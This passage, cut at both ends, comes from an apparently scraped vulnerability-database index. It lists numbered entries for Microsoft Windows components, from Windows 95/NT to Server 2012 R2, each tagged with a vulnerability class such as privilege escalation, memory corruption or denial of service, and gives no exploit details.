up to Vista SP2 Journal privilege escalation [74842] Microsoft Windows 8.1/Server 2012 R2 Hyper-V privilege escalation [74840] Microsoft Windows up to Vista EMF File privilege escalation [74834] Microsoft Windows Server 2012 R2 Active Directory Federation Services 3.0 privilege escalation [74833] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 HTTP Request HTTP.sys privilege escalation [74104] Microsoft Windows up to Vista Digital Certificate weak authentication [74022] Microsoft Windows up to Vista Certificate weak authentication [73972] Microsoft Windows up to Vista SP2 PNG Parser information disclosure [73963] Microsoft Windows up to Vista SP2 Photo Decoder information disclosure [73961] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 Remote Desktop Protocol Object Management denial of service [73960] Microsoft Windows Netlogon Service User 7PK Security Features [73959] Microsoft Windows up to Vista SP2 DLL Data Processing Error [73958] Microsoft Windows up to Vista SP2 Text Services Data Processing Error [73957] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73956] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73955] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73954] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73953] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73952] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73951] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73950] Microsoft Windows up to Vista Adobe Font Driver memory corruption [73938] Microsoft Windows VBScript Scripting Engine denial of service [69258] Microsoft Windows up to Vista Secure Channel FREAK weak encryption [69161] Microsoft Windows up to Vista information disclosure [69160] Microsoft Windows up to Server 2012 Process privilege escalation [69159] Microsoft Windows up to Vista Group Policy 7PK Security Features [69154] Microsoft Windows up to Vista Group Policy weak authentication [69153] Microsoft Windows up to Vista Font Mapper win32k.sys privilege escalation [69152] Microsoft Windows up to Vista True Type Font win32k.sys privilege escalation [69151] Microsoft Windows up to Vista Kernel-Mode Driver win32k.sys memory corruption [69150] Microsoft Windows up to Vista win32k.sys privilege escalation [69149] Microsoft Windows up to Vista Cryptography Next Generation cng.sys information disclosure [69148] Microsoft Windows up to Vista Win32k.sys privilege escalation [68596] Microsoft Windows Internet Authentication Service denial of service [68593] Microsoft Windows up to Server 2012 Network Location Awareness Service privilege escalation [68590] Microsoft Windows up to Vista TS WebProxy directory traversal [68589] Microsoft Windows up to Vista Telnet Server memory corruption [66827] Microsoft Windows Media Player 11.0.5721.5230 memory corruption [66445] Microsoft Windows 8.0/8.1 XMLDOM ActiveX Control privilege escalation [65723] Microsoft Windows Authenticode WinVerifyTrust privilege escalation [62913] Microsoft Windows up to XP SP3 Shell Numeric Error [61648] Microsoft Windows XP privilege escalation [60245] Microsoft Windows unknown vulnerability [60209] Microsoft Windows msvcrt.dll memory corruption [60065] Microsoft Windows 2000 mod_sql information disclosure [59391] Microsoft Windows memory corruption [59006] Microsoft Windows Media Center TV Pack memory corruption [59004] Microsoft Windows memory corruption [58991] Microsoft Windows XP memory corruption [58238] Microsoft Windows Data Access Components memory corruption [58236] Microsoft Windows TCP/IP Stack denial of service [57812] Microsoft Windows XP lots-of-polys-example.html privilege escalation [57692] Microsoft Windows XP denial of service [57085] Microsoft Windows msgsc.dll memory corruption [57080] Microsoft Windows privilege escalation [57014] Microsoft Windows Default Configuration [56779] Microsoft Windows Stream Buffer Engine SBE.dll privilege escalation [56598] Microsoft Windows Azure Sdk up to 1.2 privilege escalation [56383] Microsoft Windows privilege escalation [56176] Microsoft Windows 7/Server 2003/XP fxscover.exe CDrawPoly::Serialize memory corruption [55937] Microsoft Windows XP denial of service [55777] Microsoft Windows Movie Maker 2.6 memory corruption [55776] Microsoft Windows memory corruption [55775] Microsoft Windows Media Encoder 9 memory corruption [54982] Microsoft Windows 7/Vista SP2 denial of service [54981] Microsoft Windows R2 privilege escalation [54718] Microsoft Windows up to XP SP3 Print Spooler EmeraldThread privilege escalation [54717] Microsoft Windows privilege escalation [54555] Microsoft Windows 6.00.2900.5512 wab.exe memory corruption [54553] Microsoft Windows sdclt.exe weak encryption [54552] Microsoft Windows smmscrpt.dll memory corruption [54551] Microsoft Windows contact memory corruption [54547] Microsoft Windows grpconv.exe memory corruption [54342] Microsoft Windows privilege escalation [54341] Microsoft Windows Movie Maker 2.1 privilege escalation [54334] Microsoft Windows privilege escalation [54333] Microsoft Windows denial of service [54332] Microsoft Windows privilege escalation [53591] Microsoft Windows Server 2003 GetServerName cross site scripting [53511] Microsoft Windows privilege escalation [53207] Microsoft Windows Graphics Driver cdd.dll Numeric Error [53104] Microsoft Windows smtpsvc.dll privilege escalation [53103] Microsoft Windows smtpsvc.dll weak encryption [52780] Microsoft Windows cabview.dll privilege escalation [52776] Microsoft Windows SMB Client denial of service [52775] Microsoft Windows denial of service [52774] Microsoft Windows SMB Client privilege escalation [52753] Microsoft Windows information disclosure [52336] Microsoft Windows denial of service [52283] Microsoft Windows Media Player 11.0.5721.5145 memory corruption [52036] Microsoft Windows 2000 MsgBox memory corruption [51997] Microsoft Windows Media Player 9 memory corruption [51811] Microsoft Windows max3activex.dll privilege escalation [51809] Microsoft Windows denial of service [51808] Microsoft Windows privilege escalation [51807] Microsoft Windows privilege escalation [51806] Microsoft Windows privilege escalation [51804] Microsoft Windows weak encryption [51803] Microsoft Windows denial of service [51796] Microsoft Windows privilege escalation [51795] Microsoft Windows race condition [51794] Microsoft Windows privilege escalation [51793] Microsoft Windows race condition [51497] Microsoft Windows Live Messenger 2009 ActiveX Control msnmsgr.exe denial of service [51135] Microsoft Windows ir32_32.dll memory corruption [51134] Microsoft Windows privilege escalation [51133] Microsoft Windows 2000 SP4/Server 2003 SP2/SP3/XP SP2 privilege escalation [51132] Microsoft Windows memory corruption [51128] Microsoft Windows privilege escalation [51078] Microsoft Windows denial of service [51077] Microsoft Windows privilege escalation [51076] Microsoft Windows denial of service [51075] Microsoft Windows privilege escalation [51073] Microsoft Windows weak authentication [50811] Microsoft Windows denial of service [50786] Microsoft Windows 2000 llssrv.exe memory corruption [50785] Microsoft Windows privilege escalation [50783] Microsoft Windows privilege escalation [50451] Microsoft Windows GDI+ Numeric Error [50449] Microsoft Windows EducatedScholar privilege escalation [50448] Microsoft Windows privilege escalation [50447] Microsoft Windows privilege escalation [50446] Microsoft Windows Media Player 6.4 memory corruption [50445] Microsoft Windows EducatedScholar denial of service [50444] Microsoft Windows Local Security Authority Subsystem Service Numeric Error [50439] Microsoft Windows Numeric Error [50438] Microsoft Windows weak encryption [50431] Microsoft Windows privilege escalation [50430] Microsoft Windows privilege escalation [50429] Microsoft Windows privilege escalation [49866] Microsoft Windows Server 2003 privilege escalation [49745] Microsoft Windows Server 2003 denial of service [49434] Microsoft Windows 7 denial of service [49394] Microsoft Windows Server 2003 privilege escalation [49393] Microsoft Windows privilege escalation [49392] Microsoft Windows memory corruption [49391] Microsoft Windows Avifil32.dll Numeric Error [49046] Microsoft Windows Server 2003 quartz.dll privilege escalation [49045] Microsoft Windows Server 2003 quartz.dll privilege escalation [48894] Microsoft Windows Server 2003 msvidctl.dll privilege escalation [48517] Microsoft Windows 2000 denial of service [48516] Microsoft Windows Server 2008 privilege escalation [48513] Microsoft Windows Search 4.0 cross site scripting [48512] Microsoft Windows Server 2008 privilege escalation [48033] Microsoft Windows XP denial of service [47804] Microsoft Windows Media Player 11.0.5721.5260 Numeric Error [47719] Microsoft Windows 2000 memory corruption [47717] Microsoft Windows privilege escalation [47715] Microsoft Windows 2000 Wordpad memory corruption [47465] Microsoft Windows GDI+ gdiplus.dll GpFont::SetData Numeric Error [47464] Microsoft Windows unlzh.c memory corruption [47091] Microsoft Windows Server 2008 privilege escalation [47090] Microsoft Windows Server 2008 privilege escalation [47089] Microsoft Windows weak authentication [46637] Microsoft Windows DNS Server denial of service [46620] Microsoft Windows Live Messenger 2009 msnmsgr.exe privilege escalation [46007] Microsoft Windows Mobile 6.0 FTP Service directory traversal [45911] Microsoft Windows Domain Controller privilege escalation [45907] Microsoft Windows XP chm memory corruption [45905] Microsoft Windows privilege escalation [45904] Microsoft Windows memory corruption [45763] Microsoft Windows Live Messenger up to 8.5.1 information disclosure [45676] Microsoft Windows Media Player 9 quartz.dll Numeric Error [45381] Microsoft Windows Server 2008/Vista SP1 Explorer denial of service [45380] Microsoft Windows Server 2008/Vista SP1 Search denial of service [45378] Microsoft Windows Media Player up to 6.4 information disclosure [45377] Microsoft Windows Media Format Runtime up to 9.5 privilege escalation [45197] Microsoft Windows 2000 nskey.dll memory corruption [45129] Microsoft Windows Live Messenger denial of service [45063] Microsoft Windows Server 2003 Active Directory information disclosure [44860] Microsoft Windows Media Player up to 9 privilege escalation [44533] Microsoft Windows 2000 mqsvc.exe privilege escalation [44249] Microsoft Windows XP SP3 gdiplus.dll Numeric Error [44246] Microsoft Windows XP SP3 denial of service [44227] Microsoft Windows Mobile 6.0 Bluetooth privilege escalation [44069] Microsoft Windows denial of service [43982] Microsoft Windows Image Acquisition Logger ActiveX Control privilege escalation [43953] Microsoft Windows ActiveX Control wmex.dll memory corruption [43676] Microsoft Windows 2000/Server 2003/Vista/XP privilege escalation [43675] Microsoft Windows 2000/Server 2003/Vista/XP of privilege escalation [43659] Microsoft Windows Messenger 5.1 ActiveX Control information disclosure [43658] Microsoft Windows XP SP2 nslookup.exe privilege escalation [43102] Microsoft Windows 2000 SP4/Server 2003 SP2/Server 2008 DNS unknown vulnerability [42732] Microsoft Windows Server 2003/Vista/XP privilege escalation [42731] Microsoft Windows Server 2003 privilege escalation [42638] Microsoft Windows Installer 3.1.4000.1823 ActiveX Control msiexec.exe memory corruption [42328] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [42327] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [41879] Microsoft Windows 2000/Server 2003/Vista memory corruption [41878] Microsoft Windows 2000/Server 2003/Vista weak authentication [41877] Microsoft Windows Server 2003 vbscript.dll privilege escalation [41656] Microsoft Windows privilege escalation [40987] Microsoft Windows 2000 privilege escalation [40986] Microsoft Windows Vista denial of service [40416] Microsoft Windows XP memory corruption [39937] Microsoft Windows Media Player 11 Numeric Error [39769] Microsoft Windows 2000 cryptgenrandom information disclosure [39749] Microsoft Windows 2000 msjet40.dll memory corruption [39655] Microsoft Windows Server 2003 Configuration [39324] Microsoft Windows Mobile 2005 SMS privilege escalation [39013] Microsoft Windows XP explorer.exe memory corruption [39012] Microsoft Windows Live Messenger up to 8.1 doc memory corruption [38999] Microsoft Windows Server 2003 explorer.exe denial of service [38962] Microsoft Windows Media Player 9 privilege escalation [38332] Microsoft Windows Gadgets memory corruption [38329] Microsoft Windows cross site scripting [38328] Microsoft Windows memory corruption [38326] Microsoft Windows 2000 attemptwrite Numeric Error [38272] Microsoft Windows Media Player 11 wmplayer.exe denial of service [38246] Microsoft Windows denial of service [37736] Microsoft Windows Vista unknown vulnerability [37526] Microsoft Windows 2000/Server 2003 denial of service [37251] Microsoft Windows 2000 memory corruption [37157] Microsoft Windows XP Graphics Device Interface gdiplus.dll denial of service [37093] Microsoft Windows Server 2003 Error Message unknown vulnerability [36515] Microsoft Windows 2000/Server 2003/XP memory corruption [36086] Microsoft Windows XP SP1 BMP Image Integer Coercion Error [36052] Microsoft Windows 2000 memory corruption [36002] Microsoft Windows 2000/XP denial of service [35900] Microsoft Windows up to Vista GDI memory corruption [35846] Microsoft Windows 2000/Server 2003 Default Configuration [35822] Microsoft Windows Proxy Server denial of service [35708] Microsoft Windows Vista Teredo Address privilege escalation [35707] Microsoft Windows Vista Meeting Space dfsr.exe unknown vulnerability [35706] Microsoft Windows Vista weak authentication [35705] Microsoft Windows Vista weak authentication [35704] Microsoft Windows Vista/XP ARP denial of service [35703] Microsoft Windows Vista LLTD Mapper denial of service [35702] Microsoft Windows Vista LLTD Responder weak authentication [35701] Microsoft Windows Vista LLTD Mapper weak authentication [35700] Microsoft Windows Vista LLTD Mapper weak authentication [35654] Microsoft Windows XP winmm.dll mmioread denial of service [35514] Microsoft Windows Explorer ole32.dll memory corruption [35206] Microsoft Windows Server 2003/XP denial of service [34994] Microsoft Windows 2000 OLE Dialog memory corruption [34967] Microsoft Windows Mobile 5.0 denial of service [34804] Microsoft Windows Mobile 5.0 memory corruption [34794] Microsoft Windows Vista Speech Recognition sapi.dll privilege escalation [34793] Microsoft Windows Mobile 5.0 denial of service [34690] Microsoft Windows Explorer 6.0.2900.2180 explorer.exe denial of service [34207] Microsoft Windows Mobile Pocket PC Bluetooth Stack unknown vulnerability [34206] Microsoft Windows Bluetooth Stack unknown vulnerability [34038] Microsoft Windows Event Viewer eventvwr.exe unknown vulnerability [33890] Microsoft Windows XP SP2 Explorer explorer.exe denial of service [33889] Microsoft Windows Media Player 10.00.00.4036 denial of service [33795] Microsoft Windows Media Player 6.4 memory corruption [33589] Microsoft Windows Live Messenger up to 8.0 denial of service [32899] Microsoft Windows Digital Rights Management drmstor.dll storelicense memory corruption [32694] Microsoft Windows 2000 privilege escalation [31797] Microsoft Windows File Viewer winhlp32.exe memory corruption [31736] Microsoft Windows XP gdiplus.dll denial of service [31521] Microsoft Windows NT 4.0/2000/XP IP Stack denial of service [31236] Microsoft Windows information disclosure [31133] Microsoft Windows Server 2003/XP explorer.exe memory corruption [31024] Microsoft Windows Live Messenger 8.0 memory corruption [30801] Microsoft Windows up to 2000 Connection Manager memory corruption [30799] Microsoft Windows 98/ME Rendering Engine polypolygon Numeric Error [30131] Microsoft Windows NT 4.0/XP/2000/Server 2003 Distributed Transaction Coordinator denial of service [29471] Microsoft Windows Help winhlp32.exe memory corruption [29383] Microsoft Windows XP unknown vulnerability [28987] Microsoft Windows NT 4.0/2000/Server 2003 Default Configuration denial of service [28452] Microsoft Windows 2000/Server 2003/XP unknown vulnerability [28254] Microsoft Windows 2000 Rendering Engine extescape denial of service [27519] Microsoft Windows Server 2003/XP mshtml.dll denial of service [27224] Microsoft Windows up to 1999 denial of service [27160] Microsoft Windows 2000/XP Rendering Engine gdi32.dll memory corruption [26923] Microsoft Windows XP Administrator Account unknown vulnerability [26618] Microsoft Windows 2000/XP Subsystem memory corruption [26535] Microsoft Windows Distributed Transaction Coordinator msdtcprx.dll ndrallocate privilege escalation [26534] Microsoft Windows denial of service [26523] Microsoft Windows 95/98/ME/NT 4.0 Terminal Service unknown vulnerability [26519] Microsoft Windows 95/98/ME/NT 4.0 Chart widechartomultibyte memory corruption [26517] Microsoft Windows 95/98/ME/NT 4.0 Certificates unknown vulnerability [26516] Microsoft Windows 95/98/ME/NT 4.0 Active Directory unknown vulnerability [26515] Microsoft Windows 95/98/ME/NT 4.0 Access Control List unknown vulnerability [25708] Microsoft Windows unknown vulnerability [25515] Microsoft Windows orun32.exe memory corruption [25513] Microsoft Windows XP Services for UNIX unknown vulnerability [25509] Microsoft Windows msasn1.dll memory corruption [25400] Microsoft Windows 98SE user32.dll denial of service [25399] Microsoft Windows XP denial of service [25256] Microsoft Windows XP denial of service [25185] Microsoft Windows Media Player ME unknown vulnerability [24907] Microsoft Windows 2000 TCP/IP Stack denial of service [24746] Microsoft Windows 2000/ME Explorer denial of service [24283] Microsoft Windows 2000/Server 2003/XP memory corruption [24252] Microsoft Windows 2000/NT memory corruption [23410] Microsoft Windows XP Utility Manager denial of service [22675] Microsoft Windows winhlp32.exe memory corruption [22602] Microsoft Windows 2000/NT BASE winhlp32.exe memory corruption [22560] Microsoft Windows Media Player 9.0 getiteminfobyatom unknown vulnerability [68403] Microsoft Windows up to Vista information disclosure [68239] Microsoft Windows up to Vista Kerberos KDC EsikmoRoll privilege escalation [68196] Microsoft Windows up to Vista TrueType Array Index denial of service [68195] Microsoft Windows 7/Server 2003/Server 2008/Vista Input Method Editor privilege escalation [68192] Microsoft Windows up to Vista Remote Desktop Protocol weak authentication [68190] Microsoft Windows up to Vista Audio Service privilege escalation [68189] Microsoft Windows Server 2003 SP2 TCP/IP Stack privilege escalation [68184] Microsoft Windows up to Vista privilege escalation [68183] Microsoft Windows up to Vista Schannel privilege escalation [68165] Microsoft Windows up to XP OLE Automation Array OleAut32.dll SafeArrayDimen privilege escalation [68045] Microsoft Windows up to Vista SP2 OLE privilege escalation [67827] Microsoft Windows up to Vista win32k.sys privilege escalation [67826] Microsoft Windows up to Vista TrueType Font win32k.sys privilege escalation [67822] Microsoft Windows up to Vista OLE Object Packager packager.dll privilege escalation [67806] Microsoft Windows up to Vista TrueType Font privilege escalation [67362] Microsoft Windows up to Server 2012 R2 Remote Procedure Call denial of service [67326] Microsoft Windows Media Center MCPlayer.dll CSyncBasePlayer denial of service [67030] Microsoft Windows up to Vista Certificates weak authentication [67018] Microsoft Windows Server 2008/Server 2012/Server 2012 R2 Service Bus denial of service [66987] Microsoft Windows up to Vista Journal Parser privilege escalation [22011] Microsoft Windows Server 2003 idirectplay4 API denial of service [21967] Microsoft Windows 2000/ME Media Player cross site scripting [21926] Microsoft Windows XP Help Center HelpCtr.exe unknown vulnerability [21899] Microsoft Windows Server 2003/XP Help/Support Center dvdupgrd.htm memory corruption [21876] Microsoft Windows 98/2000/Server 2003/XP H.323 memory corruption [21873] Microsoft Windows ME/XP/NT 4.0/2000/Server 2003 memory corruption [21751] Microsoft Windows Media Services 4.1 TCP/IP Packet denial of service [21548] Microsoft Windows Media Player 9/ME PNG Image memory corruption [21476] Microsoft Windows 2000 Message Queue Manager memory corruption [21448] Microsoft Windows up to 2000 SP3/XP Terminal Service msgina.dll denial of service [21095] Microsoft Windows up to 2000 SP3 SMTP Service denial of service [20978] Microsoft Windows Server 2003 Shell Link directory traversal [20961] Microsoft Windows up to 2000 SP4 Troubleshooter ActiveX Control Tshoot.ocx RunQuery2 memory corruption [20960] Microsoft Windows up to Server 2003 Authenticode privilege escalation [20815] Microsoft Windows Distributed Component Object Model Interface memory corruption [20770] Microsoft Windows Media Player 7/8 IFRAME Tag privilege escalation [20662] Microsoft Windows up to 2000 SP3 shell32.dll ShellExecute memory corruption [20485] Microsoft Windows NT 4.0/2000 Media Services nsiislog.dll memory corruption [20307] Microsoft Windows NT 4.0/2000/XP RPC Endpoint Mapper denial of service [20213] Microsoft Windows 2000 Script Engine for JScript JScript.dll JsArrayFunctionHeapSort Integer Coercion Error [20182] Microsoft Windows ME Help/Support Center cross site scripting [20108] Microsoft Windows NT 4.0/2000/XP Terminal Server memory corruption [19970] Microsoft Windows 2000 Active Directory privilege escalation [19759] Microsoft Windows XP ISAKMP Service denial of service [19719] Microsoft Windows up to 2000 SP2 DCOM Client information disclosure [19574] Microsoft Windows 2000/XP Log Size denial of service [19490] Microsoft Windows Media Player up to 7.1 MP3 File Name mplay32.exe memory corruption [19355] Microsoft Windows 2000 TCP Packet denial of service [19315] Microsoft Windows XP Internet Explorer 6.0 privilege escalation [19261] Microsoft Windows XP Shell memory corruption [19231] Microsoft Windows XP Domain Controller unknown vulnerability [19194] Microsoft Windows 98/NT 4.0 Certificate weak authentication [19105] Microsoft Windows 2000/XP PPTP Service memory corruption [19082] Microsoft Windows 2000 SP2 SNMP LAN Manager denial of service [19063] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19062] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19061] Microsoft Windows 98/ME/XP ZIP Archive privilege escalation [19054] Microsoft Windows 2000/XP RDP denial of service [19053] Microsoft Windows 2000/XP RDP weak encryption [19043] Microsoft Windows NT 4.0/2000/XP CHM File memory corruption [19042] Microsoft Windows NT 4.0/2000/XP HTML Help ActiveX Control hhctrl.ocx alink memory corruption [18814] Microsoft Windows 98/98SE/ME/XP Crypto API weak authentication [18810] Microsoft Windows up to XP Certificate Enrollment ActiveX Control unknown vulnerability [18782] Microsoft Windows XP Help/Support Center uplddrvinfo.htm File denial of service [18772] Microsoft Windows NT 4.0/2000 SMB memory corruption [18709] Microsoft Windows HTML Help ActiveX Control Winhlp32.exe memory corruption [18537] Microsoft Outlook 2002 Windows Media Player player.launchurl cross site scripting [18464] Microsoft Windows 2000 Terminal Server privilege escalation [18395] Microsoft Windows Media Player 7.1 information disclosure [18351] Microsoft Windows Media Player 6.4/7.1 WMA Media File privilege escalation [18325] Microsoft Windows Media Player 8.00.00.4477 WMF File privilege escalation [18276] Microsoft Windows 2000 LANMAN Service denial of service [18214] Microsoft Windows XP TCP SYN denial of service [18130] Microsoft Windows 2000 denial of service [17973] Microsoft Windows 2000 Shell memory corruption [17960] Microsoft Windows 2000/XP SMTP Service denial of service [17959] Microsoft Windows 2000 SMTP Service privilege escalation [17958] Microsoft Windows up to XP SNMP Agent Service memory corruption [17947] Microsoft Windows 2000 Telnet Server memory corruption [17946] Microsoft Windows 2000/NT Authorization weak authentication [17890] Microsoft Windows XP Remote Desktop Client weak encryption [17871] Microsoft Windows ME SSDP Service ssdpsrv.exe denial of service [17834] Microsoft Windows 2000 NTFS privilege escalation [17761] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17760] Microsoft Windows 98/98SE/ME/XP UPnP memory corruption [17728] Microsoft Windows 2000 IKE denial of service [17718] Microsoft Windows 2000/XP Network Address Translation weak authentication [17660] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17658] Microsoft Windows Media Player up to 7.1 ASF File memory corruption [17655] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17608] Microsoft Windows XP Help Center helpctr.exe memory corruption [17572] Microsoft Windows NT 4.0 RPC Endpoint Mapper denial of service [17567] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17389] Microsoft Windows 2000 IrDA Driver memory corruption [17373] Microsoft Windows NT 4.0/2000 NNTP Service denial of service [17372] Microsoft Windows Media Player 6.4/7.0/7.1 NSC File memory corruption [17371] Microsoft Windows NT 4.0/2000 RPC Server denial of service [17310] Microsoft Windows NT 4.0/2000 DNS Server weak authentication [17266] Microsoft Windows NT 4.0 LsaQueryInformationPolicy information disclosure [17147] Microsoft Windows 2000 SMTP Service privilege escalation [17099] Microsoft Windows 98/98SE ARP denial of service [17056] Microsoft Windows 2000 Telnet Service denial of service [17055] Microsoft Windows 2000 Telnet Domain User information disclosure [17054] Microsoft Windows 2000 Telnet Service denial of service [17053] Microsoft Windows 2000 Telnet Session denial of service [17051] Microsoft Windows NT 4.0/2000 Visual Studio RAD fp30reg.dll memory corruption [17049] Microsoft Windows 2000 Message Request denial of service [16826] Microsoft Windows Media Player 6.4/7.0 Shortcut privilege escalation [16825] Microsoft Windows Media Player 6.3/6.4/7.0 ASX File memory corruption [16824] Microsoft Windows 2000 Internet Printing ISAPI Extension msw3prt.dll memory corruption [16822] Microsoft Windows 2000 Kerberos denial of service [16706] Microsoft Windows Media Player 7 WMP ActiveX Control privilege escalation [16677] Microsoft Windows 98/2000 Java Applet denial of service [16600] Microsoft Windows 2000 Event Viewer memory corruption [16540] Microsoft Windows Media Player 7 Skin skin.wmz privilege escalation [16510] Microsoft Windows NT 4.0 PPTP Server denial of service [16457] Microsoft Windows NT 4.0 MTS Package Registry privilege escalation [16417] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [16381] Microsoft Windows 2000 RDP denial of service [16370] Microsoft Windows 2000/ME Web Extender Client privilege escalation [16305] Microsoft Windows NT 4.0 Terminal Server RegAPI.DLL memory corruption [16269] Microsoft Windows Media Player 6.4/7.0 ASX File memory corruption [16267] Microsoft Windows 2000 Telnet Service denial of service [16238] Microsoft Windows 95/98/98SE/NT 4.0 TCP Connection denial of service [16232] Microsoft Windows CE 3.0.9348 Initial Sequence Number weak authentication [16212] Microsoft Windows NT 4.0/2000 SMBnegprots Request denial of service [16191] Microsoft Windows 95/98/98SE/ME NMPI Listener denial of service [16190] Microsoft Windows 95/98/98SE/ME File/Print Sharing Service weak authentication [16140] Microsoft Windows Media Player 7 OCX Control denial of service [16098] Microsoft Windows NT 4.0 Cenroll ActiveX Control xenroll.dll denial of service [16055] Microsoft Windows 2000 System Monitor ActiveX Control memory corruption [16024] Microsoft Windows 95/98/98SE NetBIOS Client denial of service [15985] Microsoft Windows up to XP Office 2000 File riched20.dll privilege escalation [15980] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [15965] Microsoft Windows 2000 NTLM Authentication telnet.exe privilege escalation [15884] Microsoft Windows 95/98 IPX Packet denial of service [15805] Microsoft Windows 95/98/NT 4.0/2000 NetBIOS weak authentication [15802] Microsoft Windows NT 4.0/2000 NetBIOS Name Server denial of service [15726] Microsoft Windows 2000 Telnet Server denial of service [15725] Microsoft Windows 2000 Port denial of service [15722] Microsoft Windows 95/98/NT 4.0 ARP Table weak authentication [15644] Microsoft Windows NT 4.0 Remote Registry Request denial of service [15628] Microsoft Windows NT 4.0/2000 DCE/RPC Request SMBwriteX denial of service [15607] Microsoft Windows Media Services 4.0/4.1 Encoder Request denial of service [15593] Microsoft Windows 95/98/NT 4.0/2000 CIFS Computer Browser denial of service [15592] Microsoft Windows NT 4.0 CIFS Computer Browser denial of service [15575] Microsoft Windows 95/98/NT 4.0/2000 IP Fragmentation Jolt2 denial of service [15554] Microsoft Windows NT 4.0 Service Control Manager denial of service [15512] Microsoft Windows 95/98 NetBIOS denial of service [15475] Microsoft Windows NT 4.0/2000 cmd.exe memory corruption [15455] Microsoft Windows 98/XP/NT 4.0/2000 Domain Name Resolver weak authentication [15397] Microsoft Windows Media Rights Manager 4.0/4.1 denial of service [15341] Microsoft Windows Media Services 4.0/4.1 Handshake denial of service [15325] Microsoft Windows 2000 Share weak authentication [15188] Microsoft Windows NT 3.5/4.0 RSH Service Utility .rhosts privilege escalation [15177] Microsoft Windows NT 4.0/2000 Policy privilege escalation [15160] Microsoft Windows NT 4.0 SP2 Password Complexity passfilt.dll weak authentication [15147] Microsoft Windows NT 4.0 Netbt.sys denial of service [15142] Microsoft Windows NT 4.0 ICMP Subnet Mask denial of service [15140] Microsoft Windows NT 4.0 Routing Information Field denial of service [15139] Microsoft Windows NT 4.0 RPC denial of service [15135] Microsoft Windows 95 Remote Administration privilege escalation [15122] Microsoft Windows NT 4.0 SNMP Agent denial of service [15066] Microsoft Windows NT 4.0 Local Security Authority Subsystem LsaLookupSids privilege escalation [15065] Microsoft Windows NT 4.0 Keystream privilege escalation [15011] Microsoft Windows NT 4.0/2000 NTMail privilege escalation [15003] Microsoft Windows 95/98 Credential privilege escalation [14987] Microsoft Windows NT System Policy weak authentication [14986] Microsoft Windows 98/NT 4.0/2000 Wordpad memory corruption [14976] Microsoft Windows Media Player ActiveX Control File information disclosure [14974] Microsoft Windows 95/98 Network privilege escalation [14921] Microsoft Windows NT 4.0 LSA lsass.exe denial of service [14849] Microsoft Windows 98/NT 4.0 IP Source Routing privilege escalation [14848] Microsoft Windows NT 4.0 RASMAN Configuration [14800] Microsoft Windows NT 4.0 TCP Initial Sequence Number weak authentication [14778] Microsoft Windows 95/98 Telnet Client memory corruption [14767] Microsoft Windows NT 4.0 Terminal Server weak authentication [14740] Microsoft Windows NT 4.0 Messenger Service denial of service [14733] Microsoft Windows NT 4.0/2000 Local Security Authority Subsystem privilege escalation [14719] Microsoft Windows NT 4.0 IOCTL privilege escalation [14718] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 IGMP Header privilege escalation [14710] Microsoft Windows NT 4.0 Image Header privilege escalation [14709] Microsoft Windows NT 3.51/NT 4.0 RAS/PPTP denial of service [14697] Microsoft Windows NT 4.0 CSRSS Worker Thread denial of service [14669] Microsoft Windows NT 4.0 RRAS/RAS Client privilege escalation [14608] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 ARP Packet denial of service [14560] Microsoft Windows 95/98/NT 4.0 ICMP Redirect Message denial of service [14489] Microsoft Windows NT 4.0 SP4 NT Hash Value weak authentication [14487] Microsoft Windows 95/98 TCP/IP Chorus denial of service [14461] Microsoft Windows 98 Packet denial of service [14454] Microsoft Windows NT 4.0 Beta Share privilege escalation [14443] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 SMB Authentication weak authentication [14429] Microsoft Windows NT Registry Key Value privilege escalation [14428] Microsoft Windows NT Registry Key Permission privilege escalation [14423] Microsoft Windows 2000/NT PDC/BDC privilege escalation [14418] Microsoft Windows 2000/NT OS/2/POSIX Subsystem privilege escalation [14394] Microsoft Windows 2000/NT NT Alerter privilege escalation [14379] Microsoft Windows NT Registry Key privilege escalation [14378] Microsoft Windows NT 4.0/2000 User Group privilege escalation [14371] Microsoft Windows up to XP Log File Size unknown vulnerability [14370] Microsoft Windows up to XP Removable Media privilege escalation [14368] Microsoft Windows up to XP Logon Box Username information disclosure [14367] Microsoft Windows up to XP Eventlog privilege escalation [14366] Microsoft Windows up to XP Registry Key privilege escalation [14362] Microsoft Windows 95/98/ME/NT File System privilege escalation [14361] Microsoft Windows NT 4.0/2000 Relationship privilege escalation [14360] Microsoft Windows up to XP Registry privilege escalation [14359] Microsoft Windows up to XP Registry privilege escalation [14358] Microsoft Windows up to XP Registry Audit Policy privilege escalation [14356] Microsoft Windows up to XP File Audit Policy privilege escalation [14354] Microsoft Windows NT Password Filter PASSFILT.DLL weak authentication [14348] Microsoft Windows NT Directory privilege escalation [14311] Microsoft Windows NT Web Server information disclosure [14310] Microsoft Windows NT 4.0 Ressource Kit denial of service [14301] Microsoft Windows NT IP Fragmentation Data Processing Error [14298] Microsoft Windows NT 3.51/NT 4.0 WFTP Server Guest weak authentication [14238] Microsoft Windows 95/NT 4.0 TCP Packet weak authentication [14228] Microsoft Windows NT 4.0 RPC Server Snork denial of service [14197] Microsoft Windows NT 4.0 WINS denial of service [14128] Microsoft Windows NT 3.51/NT 4.0 WINS Coke denial of service [14077] Microsoft Windows NT 4.0 SMB Logon denial of service [14076] Microsoft Windows 95/NT 4.0 IP Fragmentation Bonk denial of service [14042] Microsoft Windows NT 4.0 SNMP Agent snmp.exe denial of 